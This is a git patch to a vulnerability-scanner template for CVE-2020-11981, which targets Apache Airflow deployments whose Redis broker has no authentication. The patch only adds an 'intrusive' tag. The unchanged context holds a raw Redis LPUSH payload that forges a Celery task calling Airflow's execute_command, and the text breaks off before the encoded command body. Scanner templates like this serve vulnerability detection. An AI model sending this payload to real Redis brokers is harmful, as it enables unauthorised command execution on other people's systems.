From c6e9e385d1e09f06a4242a36e8a4728af9769b31 Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Thu, 15 Jun 2023 03:01:51 +0800 Subject: [PATCH] Update CVE-2020-11981.yaml --- network/cves/2020/CVE-2020-11981.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/cves/2020/CVE-2020-11981.yaml b/network/cves/2020/CVE-2020-11981.yaml index df24731669..ead3253e1c 100644 --- a/network/cves/2020/CVE-2020-11981.yaml +++ b/network/cves/2020/CVE-2020-11981.yaml @@ -18,7 +18,7 @@ info: max-request: 2 shodan-query: product:"redis" verified: true - tags: network,redis,unauth,apache,airflow,vulhub + tags: network,redis,unauth,apache,airflow,vulhub,intrusive variables: data: "*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$936\r\n{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""